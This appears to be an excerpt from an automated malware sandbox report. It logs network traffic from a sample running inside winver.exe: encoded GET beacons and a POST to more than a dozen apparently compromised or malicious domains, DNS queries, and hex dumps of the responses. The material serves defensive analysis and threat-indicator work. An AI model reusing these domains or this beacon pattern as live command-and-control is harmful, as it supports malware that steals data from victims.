            Source: global trafficHTTP traffic detected: GET /wouf/?4b34ht=XRItmHXywGWVnqDngINAMvff3IpqjclEV1ySHuRZOTcLzBiyF5+l3MoobodW+p084j4Tu28tOugkX2LbOW2aRLZQ/Vv/K47AM9XykbCYypLB0HUyScM9sRvicmb0LC0c/g==&UxF=2Nflznk0WJ3hjv HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.botcsllc.comConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /k2o4/?4b34ht=qS1OWRHNQ56Cw7+fPD172OEEUbCPY94RPpebPz6xreoqxXbgy7Cu/Z+GqTqWS2Pyzkow4Xyx1yLx23Wbx34O9asPPjW4w1AqTiokyKtl/e0W2Htu8J9pM1VOgBMsot7LIg==&UxF=2Nflznk0WJ3hjv HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.pilatovparts.ruConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /fx5q/?4b34ht=58zXcaw4QDLVkaL+G0qZOwfYBtfLZlBf9k0Qnw1Zv4bR0GQyFI5ORfMwVsCUT1zQejwif13gDfh0mdA+c9yRzCT9PqSg1LoC16c3+fSR0wz9mE2aSN+j+I+5sdCG7jTd0Q==&UxF=2Nflznk0WJ3hjv HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.cica-rank.comConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /l1oh/?4b34ht=CLj62WE97PINjru9/2Ua0S4wJ+6clgTBZzFqYLe+Zb/mrkE/j+GqxKOEwyxDIhmnv5tawjcWYXQUR2YOfRR5ys/k8mvsQ8S8w9omXjrMO8RJvp8vgkkqsEYyw/rrHr7WOA==&UxF=2Nflznk0WJ3hjv HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.diplocity.orgConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /ewqf/?4b34ht=kYShQH1sa3Le60gDrsgCYGFyuVEpRJ0k4IW5QzbfeKprYk61XZyNmSsEdCDrGrgTxI+6jeCx+L1A4qHHQky9AsRR7ruU+KhrWGBfvU9SpfMi+rY6DVY8elzf7b7Bw6Cu6g==&UxF=2Nflznk0WJ3hjv HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.falldove.topConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /11y6/?4b34ht=Dwy6CWGja1kYD5j/NiyuAt+/fS8dx1oXABRd8IB5T1BIX3lRMt9N7dOmg29JYmKAoU96l3n9gZEsdf5amHP+judxC5mcbKzq6E6B/htT/kbgwKzkG09OKna/oGm6dpHmyw==&UxF=2Nflznk0WJ3hjv HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.lesfleursdeceline.beConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /gp7t/?4b34ht=rAqEu2gSv2s2Q34sajdUQRUadeB85tkFqSKdenQDQ2DGw2dO3uX5Zw6KDTM8IV3Tf+lQDmhmNxGX2EN4uh2PDjjxVn+OEzZBTy/UzpMaoQhQyJClBqNmt4mNfKWMNb1t7Q==&UxF=2Nflznk0WJ3hjv HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.btx937.topConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /oh6m/?4b34ht=0hjtPibzKO3ZkT4WCImxDHrzyGnYBfhDxpd96Njw0Kz+uSoJqw8c1u4CpsfzEVAvZJgLgbHe9v9Z2CW7S5Mmgqq6m67vtrFp6Au24Wk/I93/9XnPpdf/S4Hde+etKMlcYw==&UxF=2Nflznk0WJ3hjv HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.equi-sen.caConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /f1h2/?4b34ht=o2w0OkdzOU7AeO8cST1vLwAMb2MVSZPok4SxmOvOEN/vFfcFf0cZDVwWJD0TY2twL06giNetwFt+I5xckOsROdTXbf+WwKvZ5D3dZkP4IlWKwwnosj8+1uAXlawkkcomhg==&UxF=2Nflznk0WJ3hjv HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.newmediamonday.comConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /viqu/?4b34ht=MVCyVDN3RwNEbgSUD+0xRye29v/XSHfdB7daKMb285I6uLH+in3mV6SqMrakijFPfITBXvDDRnIloAD3dOOGlBaUMS2RVppA4PBahCfW4PrIZhDLLp/ysGvZxQcLTJd5vQ==&UxF=2Nflznk0WJ3hjv HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.jl884.vipConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /vtm3/?4b34ht=kR7Fl86BSFGGM0PlM+jb3Z8U1XiTwr46KttiVv2q+FBEIB4NiNNJYHhFj5b5v2TtaYgnHWWiT/h6cxdEcVnMTV8uD5XBSlgGjz30dZ+o/GujFcx5HUknEw/XEJ5xYkmM6w==&UxF=2Nflznk0WJ3hjv HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.retrorocketmodels.comConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /1jr4/?4b34ht=kGdd1iddr+mvgzlLI3SGjgxAabUOGsKw2bG4JPXV9hwIwsQyE7CLPYW2F+PDsbjHTDHawkku/URFrqQj7JM/kB2xKVcJ0yqZ4Q9OBe3AFA9XjQjtHcn6JNxir1+KynzC3w==&UxF=2Nflznk0WJ3hjv HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.adylkerak.ruConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: winver.exe, 00000011.00000002.4497860511.0000000007D40000.00000004.00000800.00020000.00000000.sdmp, winver.exe, 00000011.00000002.4495925403.0000000005BE8000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000003BF8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: <li><a rel="nofollow" href="https://twitter.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.3 0.3) translate(-200 -300)"><path d="m 453.82593,412.80619 c -6.3097,2.79897 -13.09189,4.68982 -20.20852,5.54049 7.26413,-4.35454 12.84406,-11.24992 15.47067,-19.46675 -6.79934,4.03295 -14.3293,6.96055 -22.34461,8.53841 -6.41775,-6.83879 -15.56243,-11.111 -25.68298,-11.111 -19.43159,0 -35.18696,15.75365 -35.18696,35.18525 0,2.75781 0.31128,5.44359 0.91155,8.01875 -29.24344,-1.46723 -55.16995,-15.47582 -72.52461,-36.76396 -3.02879,5.19662 -4.76443,11.24048 -4.76443,17.6891 0,12.20777 6.21194,22.97747 15.65332,29.28716 -5.76773,-0.18265 -11.19331,-1.76565 -15.93716,-4.40083 -0.004,0.14663 -0.004,0.29412 -0.004,0.44248 0,17.04767 12.12889,31.26806 28.22555,34.50266 -2.95247,0.80436 -6.06101,1.23398 -9.26989,1.23398 -2.2673,0 -4.47114,-0.22124 -6.62011,-0.63114 4.47801,13.97857 17.47214,24.15143 32.86992,24.43441 -12.04227,9.43796 -27.21366,15.06335 -43.69965,15.06335 -2.84014,0 -5.64082,-0.16722 -8.39349,-0.49223 15.57186,9.98421 34.06703,15.8094 53.93768,15.8094 64.72024,0 100.11301,-53.61524 100.11301,-100.11387 0,-1.52554 -0.0343,-3.04251 -0.10204,-4.55261 6.87394,-4.95995 12.83891,-11.15646 17.55618,-18.21305 z" /></g></svg></a></li> equals www.twitter.com (Twitter)
            Source: winver.exe, 00000011.00000002.4497860511.0000000007D40000.00000004.00000800.00020000.00000000.sdmp, winver.exe, 00000011.00000002.4495925403.0000000005BE8000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000003BF8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: <li><a rel="nofollow" href="https://www.facebook.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.25 0.25) translate(30 50)"><path d="M182.409,262.307v-99.803h33.499l5.016-38.895h-38.515V98.777c0-11.261,3.127-18.935,19.275-18.935 l20.596-0.009V45.045c-3.562-0.474-15.788-1.533-30.012-1.533c-29.695,0-50.025,18.126-50.025,51.413v28.684h-33.585v38.895h33.585 v99.803H182.409z" /></g></svg></a></li> equals www.facebook.com (Facebook)
            Source: global trafficDNS traffic detected: DNS query: www.double.gay
            Source: global trafficDNS traffic detected: DNS query: www.duhocvietanh.edu.vn
            Source: global trafficDNS traffic detected: DNS query: www.botcsllc.com
            Source: global trafficDNS traffic detected: DNS query: www.pilatovparts.ru
            Source: global trafficDNS traffic detected: DNS query: www.cica-rank.com
            Source: global trafficDNS traffic detected: DNS query: www.diplocity.org
            Source: global trafficDNS traffic detected: DNS query: www.falldove.top
            Source: global trafficDNS traffic detected: DNS query: www.lesfleursdeceline.be
            Source: global trafficDNS traffic detected: DNS query: www.btx937.top
            Source: global trafficDNS traffic detected: DNS query: www.equi-sen.ca
            Source: global trafficDNS traffic detected: DNS query: www.newmediamonday.com
            Source: global trafficDNS traffic detected: DNS query: www.jl884.vip
            Source: global trafficDNS traffic detected: DNS query: www.retrorocketmodels.com
            Source: global trafficDNS traffic detected: DNS query: www.adylkerak.ru
            Source: global trafficDNS traffic detected: DNS query: www.tranivel.com
            Source: unknownHTTP traffic detected: POST /iqzp/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.duhocvietanh.edu.vnOrigin: http://www.duhocvietanh.edu.vnConnection: closeContent-Type: application/x-www-form-urlencodedCache-Control: no-cacheContent-Length: 207Referer: http://www.duhocvietanh.edu.vn/iqzp/User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4Data Raw: 34 62 33 34 68 74 3d 53 73 56 57 6e 43 42 41 69 79 74 35 74 35 52 34 6e 6e 69 32 4e 70 68 6b 73 7a 6c 43 62 65 58 4d 66 6d 52 6f 59 56 50 4a 32 7a 79 63 50 59 73 6d 42 4d 33 6e 48 45 62 62 4a 73 4c 32 4b 43 30 50 6b 61 68 64 59 4a 4f 36 71 66 6a 59 61 52 2b 56 55 65 39 2b 49 4c 43 43 6a 6d 44 5a 5a 4e 4a 47 5a 49 7a 62 70 6f 6f 6e 4c 51 76 35 6c 6d 63 4e 68 63 74 65 51 75 4f 58 58 52 6f 55 53 42 45 4b 4f 42 66 63 71 63 56 47 78 45 45 48 38 45 5a 4f 31 75 69 5a 34 61 73 2f 4a 68 33 58 54 7a 76 53 51 32 59 67 51 37 64 51 4e 4f 36 2b 50 70 65 37 56 62 59 6f 36 57 49 43 2b 64 48 73 71 79 34 73 52 51 75 4c 65 6b 51 3d Data Ascii: 4b34ht=SsVWnCBAiyt5t5R4nni2NphkszlCbeXMfmRoYVPJ2zycPYsmBM3nHEbbJsL2KC0PkahdYJO6qfjYaR+VUe9+ILCCjmDZZNJGZIzbpoonLQv5lmcNhcteQuOXXRoUSBEKOBfcqcVGxEEH8EZO1uiZ4as/Jh3XTzvSQ2YgQ7dQNO6+Ppe7VbYo6WIC+dHsqy4sRQuLekQ=
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://duhocvietanh.edu.vn/wp-json/>; rel="https://api.w.org/"content-length: 10950content-encoding: brvary: Accept-Encoding,User-Agent,Accept-Encodingdate: Mon, 27 May 2024 10:43:06 GMTserver: LiteSpeedData Raw: 82 ae 3a a2 b0 0f 17 51 d1 fa 21 40 23 65 e1 fc fd 11 32 cc fd a7 a6 f5 c5 56 55 07 f9 33 5c 2d 93 6d 00 02 a9 d3 54 d3 7d dc 33 77 bb 67 a6 b6 6c 97 0a 22 1f 49 d8 20 c0 06 40 1d a3 56 10 ee 15 fe 6c 8f 33 db 74 67 c2 3d 92 bc ff 4c f5 f3 2c cf f8 70 7f 9f 9b 74 43 14 a9 6a 87 e2 6f 5d de 3f f6 96 aa 01 41 88 80 8d c2 05 40 d1 74 49 ed 4e ab 76 4a 29 62 3a 35 be dc 99 ab bd af c5 37 64 76 f0 00 bc e2 47 2d 39 5c 48 99 2d bb cb dd d3 03 7e 02 5f 96 81 64 09 7c ad 04 22 90 03 50 d8 99 ee 99 f7 7e 92 fc 95 d6 31 c9 da e4 94 2f 38 01 fb 42 08 84 45 db 97 52 06 ec fd 8d 6f 8d 04 bd 6c e1 42 c3 e5 70 e1 2d 63 6a bb 7b 15 f2 08 e1 a8 01 bb 8c a5 b1 fb 9e 9e b7 2a 42 84 80 12 f2 d5 8d e5 d1 a0 1a 60 9d 61 41 73 68 f5 04 56 17 ce 09 1a f6 cb 75 dc af da 58 76 ef c1 58 e6 37 35 b9 7a 34 38 c4 c2 1e 85 f1 fa 45 23 9d c7 90 13 af f0 5d 57 8f 06 27 27 6e e8 e9 00 86 9c da 20 04 ae 60 2c e2 02 46 b6 98 13 1d cb 23 5c 90 f3 f5 82 9c e2 0a 0a fe e1 7b 31 5f 48 8d 79 82 06 1e e6 79 6b 1d 7c 78 03 7c 54 00 09 88 52 40 64 fb fc f0 26 c7 b2 46 12 1d 48 bb de b9 b3 6b 1b fc f9 d3 12 e7 c6 9e 89 7f 3d 85 e1 e3 3a cf 61 74 35 20 c3 3c a3 c6 ef b2 57 01 41 79 b0 5d 50 ad fa 1d 4b d8 aa d0 9c 4c e4 7b f0 57 56 fa 00 d7 6f 7e 84 9f 1c b6 aa 6f 61 24 ba bd c0 26 15 7c 01 51 18 58 d8 10 03 e3 61 6f 3e 1b 8d f6 56 fa 70 23 05 1c 65 6b 5d d9 39 f4 7e 04 e0 78 7e e4 d1 8e 80 b1 ab 41 26 db db 4f b2 46 30 36 c0 3c 61 4f cc e0 d7 17 ef e0 9d b6 6b a9 41 ed 8c f1 df 28 f9 6c 5d 5c 5b db 42 4a e9 20 a0 59 fd 72 4d 60 14 05 50 9b 89 e7 4f 84 1b 44 51 35 5d 81 a4 fd a0 0a db 82 b0 ef 30 27 6a be b0 2e 2f ee bd 35 1a 0c 72 1c c0 7c d1 60 2b 99 a3 ff 76 72 75 20 cf 29 ef da 05 92 11 81 63 b0 3e dc ba 9a 50 f2 3c f4 77 3f bb 39 90 e7 61 df 21 c9 c8 6f b8 be 56 01 09 25 cf 55 19 f7 3d 2b fb c6 16 1b 85 41 9a 86 63 d9 f3 8d 19 9d 1d 2e b4 4b 08 25 bd d3 df 0d 84 12 de cb c8 78 6e a1 a4 c4 a7 ff d9 ca 1a 92 91 d7 3d 34 5f ff fc eb 82 c2 c3 d7 3f ff 1b fc ff ff 17 6c fe e7 1f 60 d7 7f fd e3 5f 03 3c 34 5f ff f8 cf 1e b4 b4 f0 bf 7f ff f5 cf bf 98 1a c2 d7 3f fe 51 c1 fb ff f9 07 f8 e1 eb 9f 7f 51 84 92 ce 06 34 41 49 fd a2 08 ca 1a 56 69 88 46 b5 f2 34 28 09 d2 d5 18 48 26 8b a3 bc 31 c1 ed 7f b2 ca 04 0e 0f c9 27 6c 3b 2d 03 8a a5 f5 99 cf 0f e3 4f 7e a4 ab 80 ae 5d f9 e0 94 a9 8f e4 48 c9 e7 1e dd 9e 29 d3 f5 81 64 c4 78 a1 95 10 a2 2d 48 8e 77 94 28 63 08 67 93 cc 64 75 1c ef 8e 4f 47 aa 91 ba ca 9e e5 8d 32 60 82 67 9f af 6e 30 78 aa 95 79 00 87 3a 3f 2f 8d 67 b7 c1 c0 3a 42 d1 9c 8f e4 22 a7 30 18 Data Ascii: :Q!@#e2VU3\-mT}3wgl"I @Vl3tg
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://duhocvietanh.edu.vn/wp-json/>; rel="https://api.w.org/"content-length: 10950content-encoding: brvary: Accept-Encoding,User-Agent,Accept-Encodingdate: Mon, 27 May 2024 10:43:08 GMTserver: LiteSpeedData Raw: 82 ae 3a a2 b0 0f 17 51 d1 fa 21 40 23 65 e1 fc fd 11 32 cc fd a7 a6 f5 c5 56 55 07 f9 33 5c 2d 93 6d 00 02 a9 d3 54 d3 7d dc 33 77 bb 67 a6 b6 6c 97 0a 22 1f 49 d8 20 c0 06 40 1d a3 56 10 ee 15 fe 6c 8f 33 db 74 67 c2 3d 92 bc ff 4c f5 f3 2c cf f8 70 7f 9f 9b 74 43 14 a9 6a 87 e2 6f 5d de 3f f6 96 aa 01 41 88 80 8d c2 05 40 d1 74 49 ed 4e ab 76 4a 29 62 3a 35 be dc 99 ab bd af c5 37 64 76 f0 00 bc e2 47 2d 39 5c 48 99 2d bb cb dd d3 03 7e 02 5f 96 81 64 09 7c ad 04 22 90 03 50 d8 99 ee 99 f7 7e 92 fc 95 d6 31 c9 da e4 94 2f 38 01 fb 42 08 84 45 db 97 52 06 ec fd 8d 6f 8d 04 bd 6c e1 42 c3 e5 70 e1 2d 63 6a bb 7b 15 f2 08 e1 a8 01 bb 8c a5 b1 fb 9e 9e b7 2a 42 84 80 12 f2 d5 8d e5 d1 a0 1a 60 9d 61 41 73 68 f5 04 56 17 ce 09 1a f6 cb 75 dc af da 58 76 ef c1 58 e6 37 35 b9 7a 34 38 c4 c2 1e 85 f1 fa 45 23 9d c7 90 13 af f0 5d 57 8f 06 27 27 6e e8 e9 00 86 9c da 20 04 ae 60 2c e2 02 46 b6 98 13 1d cb 23 5c 90 f3 f5 82 9c e2 0a 0a fe e1 7b 31 5f 48 8d 79 82 06 1e e6 79 6b 1d 7c 78 03 7c 54 00 09 88 52 40 64 fb fc f0 26 c7 b2 46 12 1d 48 bb de b9 b3 6b 1b fc f9 d3 12 e7 c6 9e 89 7f 3d 85 e1 e3 3a cf 61 74 35 20 c3 3c a3 c6 ef b2 57 01 41 79 b0 5d 50 ad fa 1d 4b d8 aa d0 9c 4c e4 7b f0 57 56 fa 00 d7 6f 7e 84 9f 1c b6 aa 6f 61 24 ba bd c0 26 15 7c 01 51 18 58 d8 10 03 e3 61 6f 3e 1b 8d f6 56 fa 70 23 05 1c 65 6b 5d d9 39 f4 7e 04 e0 78 7e e4 d1 8e 80 b1 ab 41 26 db db 4f b2 46 30 36 c0 3c 61 4f cc e0 d7 17 ef e0 9d b6 6b a9 41 ed 8c f1 df 28 f9 6c 5d 5c 5b db 42 4a e9 20 a0 59 fd 72 4d 60 14 05 50 9b 89 e7 4f 84 1b 44 51 35 5d 81 a4 fd a0 0a db 82 b0 ef 30 27 6a be b0 2e 2f ee bd 35 1a 0c 72 1c c0 7c d1 60 2b 99 a3 ff 76 72 75 20 cf 29 ef da 05 92 11 81 63 b0 3e dc ba 9a 50 f2 3c f4 77 3f bb 39 90 e7 61 df 21 c9 c8 6f b8 be 56 01 09 25 cf 55 19 f7 3d 2b fb c6 16 1b 85 41 9a 86 63 d9 f3 8d 19 9d 1d 2e b4 4b 08 25 bd d3 df 0d 84 12 de cb c8 78 6e a1 a4 c4 a7 ff d9 ca 1a 92 91 d7 3d 34 5f ff fc eb 82 c2 c3 d7 3f ff 1b fc ff ff 17 6c fe e7 1f 60 d7 7f fd e3 5f 03 3c 34 5f ff f8 cf 1e b4 b4 f0 bf 7f ff f5 cf bf 98 1a c2 d7 3f fe 51 c1 fb ff f9 07 f8 e1 eb 9f 7f 51 84 92 ce 06 34 41 49 fd a2 08 ca 1a 56 69 88 46 b5 f2 34 28 09 d2 d5 18 48 26 8b a3 bc 31 c1 ed 7f b2 ca 04 0e 0f c9 27 6c 3b 2d 03 8a a5 f5 99 cf 0f e3 4f 7e a4 ab 80 ae 5d f9 e0 94 a9 8f e4 48 c9 e7 1e dd 9e 29 d3 f5 81 64 c4 78 a1 95 10 a2 2d 48 8e 77 94 28 63 08 67 93 cc 64 75 1c ef 8e 4f 47 aa 91 ba ca 9e e5 8d 32 60 82 67 9f af 6e 30 78 aa 95 79 00 87 3a 3f 2f 8d 67 b7 c1 c0 3a 42 d1 9c 8f e4 22 a7 30 18 Data Ascii: :Q!@#e2VU3\-mT}3wgl"I @Vl3tg
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: 7ccaf680-076e-406e-9082-2d4f4500fffax-runtime: 0.038115content-length: 18203connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: 43bd9ea3-1f62-449d-8baa-5a20ee528cd2x-runtime: 0.024217content-length: 18223connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 